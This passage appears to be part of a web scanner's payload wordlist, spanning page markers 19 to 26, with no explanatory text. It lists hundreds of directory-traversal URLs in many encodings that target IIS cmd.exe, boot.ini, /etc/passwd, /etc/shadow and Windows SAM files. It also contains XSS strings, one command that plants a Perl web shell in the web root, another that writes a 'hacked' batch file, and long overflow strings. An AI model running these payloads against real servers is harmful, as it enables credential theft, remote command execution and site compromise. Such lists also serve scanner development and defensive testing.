AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA.shtml /%a%s%p%d /%bg%ae%bg%ae/%bg%ae%bg%ae/winnt/system32/cmd.exe?/c+dir /%c0%9u%c0%9u/%c0%9u%c0%9u/winnt/system32/cmd.exe?/c+dir /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae %c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae %c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae %c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae %c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini /%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir /%c0%af%00.nsf/../lotus/domino/notes.ini /%c0%af%00.nsf/../winnt/win.ini /%c0%af.nsf/..//lotus/domino/notes.ini /%c0%af.nsf/..//winnt/win.ini /%c0%af.nsf//../lotus/domino/notes.ini /%c0%af.nsf//../winnt/win.ini /%c0%qe%c0%qe/%c0%qe%c0%qe/winnt/system32/cmd.exe?/c+dir /%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\ /%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe?/c+dir /%cg%ae%cg%ae/%cg%ae%cg%ae/winnt/system32/cmd.exe?/c+dir /%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe?/c+dir /%d0%9u%d0%9u/%d0%9u%d0%9u/winnt/system32/cmd.exe?/c+dir /%d0%ae%d0%ae/%d0%ae%d0%ae/winnt/system32/cmd.exe?/c+dir /%d0%qe%d0%qe/%d0%qe%d0%qe/winnt/system32/cmd.exe?/c+dir /%dg%80%ae%dg%80%ae/%dg%80%ae%dg%80%ae/winnt/system32/cmd.exe?/c+dir /%dg%80%qe%dg%80%qe/%dg%80%qe%dg%80%qe/winnt/system32/cmd.exe?/c+dir /%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe?/c+dir

(19)

/%dg%o0%ae%dg%o0%ae/%dg%o0%ae%dg%o0%ae/winnt/system32/cmd.exe?/c+dir /%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe?/c+dir /%e0%80%9u%e0%80%9u/%e0%80%9u%e0%80%9u/winnt/system32/cmd.exe?/c+dir /%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/winnt/system32/cmd.exe?/c+dir /%e0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir /%e0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir /%e0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir /%s%s%s /%u0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir /%u0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir /%u0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir /%u0%80%9u%u0%80%9u/%u0%80%9u%u0%80%9u/winnt/system32/cmd.exe?/c+dir /%u0%80%ae%u0%80%ae/%u0%80%ae%u0%80%ae/winnt/system32/cmd.exe?/c+dir /%u002F%u002E%u002E%u005C%u002E%u002E %u0075%u0030%u0030%u0032%u0035%u0075%u0030%u0030%u0035%u0063%u0057%u0049%u0 04E%u004E%u0054%u002F%u0073%u0079%u0073%u0074%u0065%u006D %u0033%u0032%u002Fcmd.exe?/c+dir+c: /&lt /*.* /*.jsp/ /*.jsp::$DATA/ /*.shtml/login.jsp /++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++<script>alert('XSS');</script>.idc /++/ /+./ /+/ /+/index.jsp /+ADw-SCRIPT+AD4-alert(xss)+ADw-+AC8-SCRIPT+AD4-.ida /+ADw-SCRIPT+AD4-alert(xss)+ADw-/SCRIPT+AD4-.htw? CiWebHitsFile=/iisstart.asp&CiRestriction='' /-cgi-bin /-icons /."./ /."./."./."./."./."./."./winnt/win.ini%20.php3 /."./."./Perl/eg/core/findtar+&+echo+system(@ARGV); +>+c:\InetPub\wwwroot\cmd.pl+&+.pl /."./."./winnt/win.ini%20.php3 /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd /.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir /.%252e/.%252e/winnt/system32/cmd.exe?/c+dir /.*/ldapcalhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%3FAAAAAAAAAAAAAAA %3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB /.. /..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /..%%35%63../winnt/system32/cmd.exe?/c+dir /..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: /..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c: /..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /..%%35c../winnt/system32/cmd.exe?/c+dir /.. %25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /..%25%35%63../winnt/system32/cmd.exe?/c+dir /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ /..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:

(20)

/..%252f../httpodbc.dll /..%252f../winnt/system32/cmd.exe?/c+dir /..%255c%255c../winnt/system32/cmd.exe?/c+dir /..%255c..%255../ /..%255c..%255/ /..%255c..%255c..%255c..%255c..%255c..%255c..%255c../boot.ini /..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini /..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ /..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir /..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir /..%255C../..%255C../..%255C../winnt/system32/cmd.exe?/c%20dir /..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /..%255c../winnt/system32/cmd.exe?/c+dir /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini /..%5C..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini /..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini /..%5C../..%5C../..%5C../..%5C../..%5Cboot.ini /..%5C../..%5C../..%5C../..%5C../etc/passwd /..%bg%9v../winnt/system32/cmd.exe?/c+dir /..%bg%af../winnt/system32/cmd.exe?/c+dir /..%bg%qf../winnt/system32/cmd.exe?/c+dir /..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir+c: /..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir /..%c0%9v../winnt/system32/cmd.exe?/c+ /..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: /..%C0%AF../..%C0%AF../..%C0%AF../..%C0%AF../boot.ini /..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir /..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../boot.ini /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini /..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini /..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+ /..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: /..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir /..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:Or /..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: /..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir /..%c1%8s../winnt/system32/cmd.exe?/c+dir /..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../boot.ini /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini /..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini /..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+ /..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: /..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir /..%c1%9c../winnt/system32/cmd.exe?/c+dir /..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir+c: /..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir

(21)

/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: /..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir /..%c1%pc../winnt/system32/cmd.exe?/c+dir /..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: /..%c1%pc..c1%pc../winnt/system32/cmd.exe?/c+dir+c: /..%cg%9v../winnt/system32/cmd.exe?/c+dir /..%cg%af../winnt/system32/cmd.exe?/c+dir /..%cg%qf../winnt/system32/cmd.exe?/c+dir /..%ch%8s../winnt/system32/cmd.exe?/c+dir /..%ch%9c../winnt/system32/cmd.exe?/c+dir /..%ch%pc../winnt/system32/cmd.exe?/c+dir /..%d0%9v../winnt/system32/cmd.exe?/c+dir /..%d0%af../winnt/system32/cmd.exe?/c+dir /..%d0%qf../winnt/system32/cmd.exe?/c+dir /..%d1%8s../winnt/system32/cmd.exe?/c+dir /..%d1%9c../winnt/system32/cmd.exe?/c+dir /..%d1%pc../winnt/system32/cmd.exe?/c+dir /..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: /..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir /..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir /..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /..%fc%80%80%80%80%af..%fc %80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: /..%fc%80%80%80%80%af../..%fc %80%80%80%80%af../winnt/system32/cmd.exe?/c+dir /..%s0%9v../winnt/system32/cmd.exe?/c+dir /..%s0%af../winnt/system32/cmd.exe?/c+dir /..%s0%qf../winnt/system32/cmd.exe?/c+dir /..%t0%af../winnt/system32/cmd.exe?/c+dir /..%t0%qf../winnt/system32/cmd.exe?/c+dir /..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\ /..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\ /.../config.sys /.../boot.ini /.../boot.ini /.../boot.ini /.../config.sys /.../etc/passwd /.../boot.ini /.../boot.ini /.../boot.ini /.../boot.ini /.../boot.ini /.../boot.ini /.../boot.ini /.../boot.ini /.../boot.ini /.../windows/win.ini /.../autoexec.bat /.../boot.ini /.../ /.../boot.ini /.../|/.../ /.../boot.ini /.../...ida/con /.../autoexec.bat /.../boot.ini /.../boot.ini /.../config.sys /.../etc/hosts

(22)

/.../etc/master.passwd /.../etc/passwd /.../etc/security/passwd /.../etc/security/passwd.adjunct /.../etc/shadow /.../Windows/Admin.pwl /.../Winnt/Admin.pwl /...autoexec.bat /.../boot.ini /.../boot.ini /..../autoexec.bat /..../boot.ini /..../config.sys /..../etc/motd /..../scandisk.log /..../Windows/Admin.pwl /..../Windows/Admin.pwl /..../winnt/repair/sam._ /.../ /.../.../ /.../.../.../ /.../.../.../.../ /.../.../.../.../.../ /.../.../.../.../.../.../ /.../.../.../.../.../.../.../ /.../.../.../.../.../.../.../.../ /.../.../.../.../.../.../.../.../.../ /.../.../.../.../.../.../.../.../.../.../ /.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../ /.../.../.../.../.../.../.../.../.../.../.../.../...//boot.ini /.../.../.../.../.../.../.../.../.../boot.ini /.../.../.../winnt/system32/cmd.exe?/c+dir /.../boot.ini /...nsf/..//lotus/domino/notes.ini /...nsf/..//winnt/win.ini /...nsf//../lotus/domino/notes.ini /...nsf//../winnt/win.ini /../ /../.. /../../ /../../../ /../../../../ /../../../../../ /../../../../../../ /../../../../../../../ /../../../../../../../../ /../../../../../../../../../ /../../../../../../../../../../ /../../../../../../../../../../../ /../../../../../../../../../../../../ /../../../../../../../../../../../../../ /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../..

(23)

/../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../../../../../../.. /../../../../../../../../../../../../../../../../../../../ /../../../../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/passwd /../../../../../../../../../../WINNT/system32/ipconfig.exe /../../../../../../../../../boot.ini /../../../../../../../../boot.ini /../../../../../../../../etc/passwd /../../../../../../../../windows/win.ini /../../../../../../../../winnt/win.ini /../../../../../../../boot.ini /../../../../../../../etc/passwd /../../../../../../../winnt/win.ini /../../../../../../boot.ini /../../../../../../Scandisk.log /../../../../../.rhosts /../../../../../boot.ini /../../../../../etc/passwd /../../../../../winnt/repair/sam._

(24)

/../../../../boot.ini /../../../../config.sys /../../../../etc/passwd /../../../../winnt/repair/sam._ /../../../autoexec.bat /../../../boot.ini /../../../etc/passwd /../../../scandisk.log /../../boot.ini /../../cmd.exe?%2FC+echo+\'hacked!\'>c:\\hello.bat /../../config.sys /../../etc/passwd /../../i386/hosts /../../passwd /../../shadow /../../windows/user.dat /../../winnt/win.ini /../<script>alert('css')</script> /../<script>alert(xss)</script> /../boot.ini /../data/passwd.txt /../examples//WEB-INF/../../../../ /../root/ /..<script>alert(xss)</script> /..\ /..\%e0\%80\%af../..\%e0\%80\%af../..\ %e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c: /..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini /..\..\..\..\..\..\..\boot.ini /..\..\..\..\..\..\autoexec.bat /..\..\..\..\..\..\boot.ini /..\..\..\..\..\..\temp\temp.class /..\..\..\..\..\autoexec.bat /..\..\..\..\autoexec.bat /..\..\..\autoexec.bat /..\..\..\winnt\repair\sam._ /..\..\autoexec.bat /..\/..\ /..\/..\/..\ /..\/..\/..\/..\ /..\/..\/..\/..\/..\ /..\/..\/..\/..\/..\/..\ /..\/..\/..\/..\/..\/..\/..\ /..\/..\/..\/..\/..\/..\/..\/..\ /..\/..\/..\/..\/..\/..\/..\/..\/..\ /..\/..\/..\/..\/..\/..\/..\/..\/..\/..\ /..\\..\\..\winnt\repair\sam._ /..\\..\\..\\..\\..\\..\autoexec.bat /..\\..\\..\\..\\..\\..\\..\\boot.ini /..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\ /..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+c:\\ /./ /./../mpweb.ini /./././././././././././././././././././././././././././././././././././././ ./././././././././././././././././././././././././././././././././././././. /./././././././././././././././././././././../../../../../../../../boot.ini /./cgi-bin//test%20cgi /./WEB-INF/ /./webadmin.nsf /./winnt/system32/cmd.exe?/c+dir/scripts/.. %25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

(25)

/.access /.acf /.addressbook /.adm /.adm/ /.admin /.admin/ /.aspx /.bashrc /.bash_history /.box/../winnt/win.ini /.cfm /.cgi-bin /.cobalt/ /.cobalt/.cobalt/siteUserMod/siteUserMod.cgi /.cobalt/alert/service.cgi? service=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

(26)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 